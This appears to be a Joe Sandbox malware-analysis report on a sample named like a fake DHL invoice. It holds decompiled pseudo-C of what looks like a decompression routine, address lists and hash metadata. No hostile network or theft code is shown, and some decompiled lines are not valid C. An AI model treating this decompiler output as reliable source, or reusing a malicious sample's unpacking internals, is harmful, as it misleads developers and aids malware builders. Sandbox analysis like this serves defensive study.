								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406cda
0x00406cda
0x00406cde
0x00406d95
0x00406d98
0x00406da4
0x00406c85
0x00406c85
0x00406c88
0x00406ffa
0x00406ffa
0x00406ffd
0x00406ffd
0x00407003
0x00407009
0x0040700f
0x00407029
0x0040702c
0x00407032
0x0040703d
0x0040703f
0x00407011
0x00407011
0x00407020
0x00407024
0x00407024
0x00407049
0x00407070
0x00407070
0x00407076
0x00407076
0x00000000
0x0040704b
0x0040704b
0x0040704f
0x004071fe
0x00000000
0x004071fe
0x0040705b
0x00407062
0x0040706a
0x0040706d
0x00000000
0x0040706d
0x00406ce4
0x00406ce8
0x00407229
0x00407229
0x0040722c
0x00407230
0x00407230
0x00406cee
0x00406cf4
0x00406cf7
0x00406cfb
0x00406cfe
0x00406d02
0x004071c8
0x00407214
0x0040721c
0x00407223
0x00407225
0x00000000
0x00407225
0x00406d08
0x00406d0b
0x00406d11
0x00406d13
0x00406d13
0x00406d16
0x00406d19
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d26
0x00406d28
0x00406d28
0x00406d28
0x00406d2b
0x00406d2e
0x00406d31
0x00406d34
0x00406d34
0x00406d37
0x00406d39
0x00406d39
0x00406d3c
0x00406d3c
0x00406d3c
0x00406812
0x00406812
0x0040681b
0x00000000
0x00000000
0x00406821
0x00000000
0x0040682c
0x00000000
0x00000000
0x00406835
0x00406838
0x0040683b
0x0040683f
0x00000000
0x00000000
0x00406845
0x00406848
0x0040684a
0x0040684b
0x0040684e
0x00406850
0x00406851
0x00406853
0x00406856
0x0040685b
0x00406860
0x00406869
0x0040687c
0x0040687f
0x0040688b
0x004068b3
0x004068b5
0x004068c3
0x004068c3
0x004068c7
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b7
0x004068b7
0x004068ba
0x004068bb
0x004068bb
0x00000000
0x004068b7
0x00406891
0x00406896
0x00406896
0x0040689f
0x004068a7
0x004068aa
0x00000000
0x004068b0
0x004068b0
0x00000000
0x004068b0
0x00000000
0x004068cd
0x004068cd
0x004068d1
0x0040717d
0x00000000
0x0040717d
0x004068da
0x004068ea
0x004068ed
0x004068f0
0x004068f0
0x004068f0
0x004068f3
0x004068f7
0x00000000
0x00000000
0x004068f9
0x004068ff
0x00406929
0x0040692f
0x00406936
0x00000000
0x00406936
0x00406905
0x00406908
0x0040690d
0x0040690d
0x00406918
0x00406920
0x00406923
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406968
0x0040696e
0x00406971
0x0040697e
0x00406986
0x00000000
0x00000000
0x0040693d
0x0040693d
0x00406941
0x0040718c
0x00000000
0x0040718c
0x0040694d
0x00406958
0x00406958
0x00406958
0x0040695b
0x0040695e
0x00406961
0x00406966
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040698e
0x00406990
0x00406993
0x00406a04
0x00406a07
0x00406a0a
0x00406a11
0x00406a1b
0x00000000
0x00406a1b
0x00406995
0x00406999
0x0040699c
0x0040699e
0x004069a1
0x004069a4
0x004069a6
0x004069a9
0x004069ab
0x004069b0
0x004069b3
0x004069b6
0x004069ba
0x004069c1
0x004069c4
0x004069cb
0x004069cf
0x004069d7
0x004069d7
0x004069d7
0x004069d1
0x004069d1
0x004069d1
0x004069c6
0x004069c6
0x004069c6
0x004069db
0x004069de
0x004069fc
0x004069fe
0x00000000
0x004069e0
0x004069e0
0x004069e3
0x004069e6
0x004069e9
0x004069eb
0x004069eb
0x004069eb
0x004069ee
0x004069f1
0x004069f3
0x004069f4
0x004069f7
0x00000000
0x004069f7
0x00000000
0x00406c2d
0x00406c31
0x00406c4f
0x00406c52
0x00406c59
0x00406c5c
0x00406c5f
0x00406c62
0x00406c65
0x00406c68
0x00406c6a
0x00406c71
0x00406c72
0x00406c74
0x00406c77
0x00406c7a
0x00406c7d
0x00406c7d
0x00406c82
0x00000000
0x00406c82
0x00406c33
0x00406c36
0x00406c39
0x00406c43
0x00000000
0x00000000
0x00406c97
0x00406c9b
0x00406cbe
0x00406cc1
0x00406cc4
0x00406cce
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca3
0x00406ca6
0x00406cb3
0x00406cb6
0x00406cb6
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d4b
0x00406d4f
0x00406d56
0x00406d59
0x00406d5c
0x00406d66
0x00000000
0x00406d66
0x00406d51
0x00000000
0x00000000
0x00406d72
0x00406d76
0x00406d7d
0x00406d80
0x00406d83
0x00406d78
0x00406d78
0x00406d78
0x00406d86
0x00406d89
0x00406d8c
0x00406d8c
0x00406d8f
0x00406d92
0x00000000
0x00000000
0x00406e32
0x00406e32
0x00406e36
0x004071d4
0x00000000
0x004071d4
0x00406e3c
0x00406e3f
0x00406e42
0x00406e46
0x00406e49
0x00406e4f
0x00406e51
0x00406e51
0x00406e51
0x00406e54
0x00406e57
0x00000000
0x00000000
0x00406a27
0x00406a27
0x00406a2b
0x00407198
0x00000000
0x00407198
0x00406a31
0x00406a34
0x00406a37
0x00406a3b
0x00406a3e
0x00406a44
0x00406a46
0x00406a46
0x00406a46
0x00406a49
0x00406a4c
0x00406a4c
0x00406a4f
0x00406a52
0x00000000
0x00000000
0x00406a58
0x00406a5e
0x00000000
0x00000000
0x00406a64
0x00406a64
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a75
0x00406a78
0x00406a7a
0x00406a80
0x00406a83
0x00406a86
0x00406a89
0x00406a8c
0x00406a8f
0x00406a92
0x00406aae
0x00406ab1
0x00406ab4
0x00406ab7
0x00406abe
0x00406ac2
0x00406ac4
0x00406ac8
0x00406a94
0x00406a94
0x00406a98
0x00406aa0
0x00406aa5
0x00406aa7
0x00406aa9
0x00406aa9
0x00406acb
0x00406ad2
0x00406ad5
0x00000000
0x00406adb
0x00000000
0x00406adb
0x00000000
0x00406ae0
0x00406ae0
0x00406ae4
0x004071a4
0x00000000
0x004071a4
0x00406aea
0x00406aed
0x00406af0
0x00406af4
0x00406af7
0x00406afd
0x00406aff
0x00406aff
0x00406aff
0x00406b02
0x00406b05
0x00406b05
0x00406b05
0x00406b0b
0x00000000
0x00000000
0x00406b0d
0x00406b10
0x00406b13
0x00406b16
0x00406b19
0x00406b1c
0x00406b1f
0x00406b22
0x00406b25
0x00406b28
0x00406b2b
0x00406b43
0x00406b46
0x00406b49
0x00406b4c
0x00406b4c
0x00406b4f
0x00406b53
0x00406b55
0x00406b2d
0x00406b2d
0x00406b35
0x00406b3a
0x00406b3c
0x00406b3e
0x00406b3e
0x00406b58
0x00406b5f
0x00406b62
0x00000000
0x00406b64
0x00000000
0x00406b64
0x00406b62
0x00406b69
0x00406b69
0x00406b69
0x00406b69
0x00000000
0x00000000
0x00406ba4
0x00406ba4
0x00406ba8
0x004071b0
0x00000000
0x004071b0
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb8
0x00406bbb
0x00406bc1
0x00406bc3
0x00406bc3
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bcf
0x00406b6d
0x00406b6d
0x00406b70
0x00000000
0x00406b70
0x00406bd1
0x00406bd1
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be0
0x00406be3
0x00406be6
0x00406be9
0x00406bec
0x00406bef
0x00406c07
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c17
0x00406c19
0x00406bf1
0x00406bf1
0x00406bf9
0x00406bfe
0x00406c00
0x00406c02
0x00406c02
0x00406c1c
0x00406c23
0x00406c26
0x00000000
0x00406c28
0x00000000
0x00406c28
0x00000000
0x00406eb5
0x00406eb5
0x00406eb9
0x004071e0
0x00000000
0x004071e0
0x00406ebf
0x00406ec2
0x00406ec5
0x00406ec9
0x00406ecc
0x00406ed2
0x00406ed4
0x00406ed4
0x00406ed4
0x00406ed7
0x00000000
0x00000000
0x00000000
0x00000000
0x00406fc4
0x00406fc8
0x00406fea
0x00406fed
0x00406ff7
0x00000000
0x00406ff7
0x00406fca
0x00406fcd
0x00406fd1
0x00406fd4
0x00406fd4
0x00406fd7
0x00000000
0x00000000
0x00407081
0x00407085
0x004070a3
0x004070a3
0x004070a3
0x004070aa
0x004070b1
0x004070b8
0x004070b8
0x00000000
0x004070b8
0x00407087
0x0040708a
0x0040708d
0x00407090
0x00407097
0x00406fdb
0x00406fdb
0x00406fde
0x00000000
0x00000000
0x00407172
0x00407175
0x00000000
0x00000000
0x00406dac
0x00406dae
0x00406db5
0x00406db6
0x00406db8
0x00406dbb
0x00000000
0x00000000
0x00406dc3
0x00406dc6
0x00406dc9
0x00406dcb
0x00406dcd
0x00406dcd
0x00406dce
0x00406dd1
0x00406dd8
0x00406ddb
0x00406de9
0x00000000
0x00000000
0x004070bf
0x004070bf
0x004070c2
0x004070c9
0x00000000
0x00000000
0x004070ce
0x004070ce
0x004070d2
0x0040720a
0x00000000
0x0040720a
0x004070d8
0x004070db
0x004070de
0x004070e2
0x004070e5
0x004070eb
0x004070ed
0x004070ed
0x004070ed
0x004070f0
0x004070f3
0x004070f3
0x004070f3
0x004070f3
0x004070f6
0x004070f6
0x004070fa
0x0040715a
0x0040715d
0x00407162
0x00407163
0x00407165
0x00407167
0x0040716a
0x00000000
0x0040716a
0x004070fc
0x00407102
0x00407105
0x00407108
0x0040710b
0x0040710e
0x00407111
0x00407114
0x00407117
0x0040711a
0x0040711d
0x00407136
0x00407139
0x0040713c
0x0040713f
0x00407143
0x00407145
0x00407145
0x00407146
0x00407149
0x0040711f
0x0040711f
0x00407127
0x0040712c
0x0040712e
0x00407131
0x00407131
0x0040714c
0x00407153
0x00000000
0x00407155
0x00000000
0x00407155
0x00000000
0x00406df1
0x00406df4
0x00406e2a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5a
0x00406f5d
0x00406f5d
0x00406f60
0x00406f62
0x004071ec
0x00000000
0x004071ec
0x00406f68
0x00406f6b
0x00000000
0x00000000
0x00406f71
0x00406f75
0x00406f78
0x00406f78
0x00406f78
0x00000000
0x00406f78
0x00406df6
0x00406df8
0x00406dfa
0x00406dfc
0x00406dff
0x00406e00
0x00406e02
0x00406e04
0x00406e07
0x00406e0a
0x00406e20
0x00406e25
0x00406e5d
0x00406e5d
0x00406e61
0x00406e8d
0x00406e8f
0x00406e96
0x00406e99
0x00406e9c
0x00406e9c
0x00406ea1
0x00406ea1
0x00406ea3
0x00406ea6
0x00406ead
0x00406eb0
0x00406edd
0x00406edd
0x00406ee0
0x00406ee3
0x00406f57
0x00406f57
0x00406f57
0x00000000
0x00406f57
0x00406ee5
0x00406eeb
0x00406eee
0x00406ef1
0x00406ef4
0x00406ef7
0x00406efa
0x00406efd
0x00406f00
0x00406f03
0x00406f06
0x00406f1f
0x00406f21
0x00406f24
0x00406f25
0x00406f28
0x00406f2a
0x00406f2d
0x00406f2f
0x00406f31
0x00406f34
0x00406f36
0x00406f39
0x00406f3d
0x00406f3f
0x00406f3f
0x00406f40
0x00406f43
0x00406f46
0x00406f08
0x00406f08
0x00406f10
0x00406f15
0x00406f17
0x00406f1a
0x00406f1a
0x00406f49
0x00406f50
0x00406eda
0x00406eda
0x00406eda
0x00406eda
0x00000000
0x00406f52
0x00000000
0x00406f52
0x00406f50
0x00406e63
0x00406e66
0x00406e68
0x00406e6b
0x00406e6e
0x00406e71
0x00406e73
0x00406e76
0x00406e79
0x00406e79
0x00406e7c
0x00406e7c
0x00406e7f
0x00406e86
0x00406e5a
0x00406e5a
0x00406e5a
0x00406e5a
0x00000000
0x00406e88
0x00000000
0x00406e88
0x00406e86
0x00406e0c
0x00406e0f
0x00406e11
0x00406e14
0x00000000
0x00000000
0x00406b73
0x00406b73
0x00406b77
0x004071bc
0x00000000
0x004071bc
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b89
0x00406b8c
0x00406b8f
0x00406b91
0x00406b94
0x00406b97
0x00406b9a
0x00406b9c
0x00406b9c
0x00406b9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f7b
0x00406f7b
0x00406f7b
0x00406f7f
0x00000000
0x00000000
0x00406f85
0x00406f88
0x00406f8b
0x00406f8e
0x00406f90
0x00406f90
0x00406f90
0x00406f93
0x00406f96
0x00406f99
0x00406f9c
0x00406f9f
0x00406fa2
0x00406fa3
0x00406fa5
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb8
0x00406fba
0x00406fbd
0x00000000
0x00406fbf
0x00000000
0x00406fbf
0x00406fbd
0x004071f2
0x00000000
0x00000000
0x00406821

Memory Dump Source

Source File: 00000001.00000002.17982408419.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.17982352476.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982487562.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982533825.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982772919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982864511.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982935048.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17982976949.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.17983114217.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_DHL-INVOICE-MBV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Uniqueness

Uniqueness Score: -1.00%

Function 004067DF Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E004067DF(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00407231))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
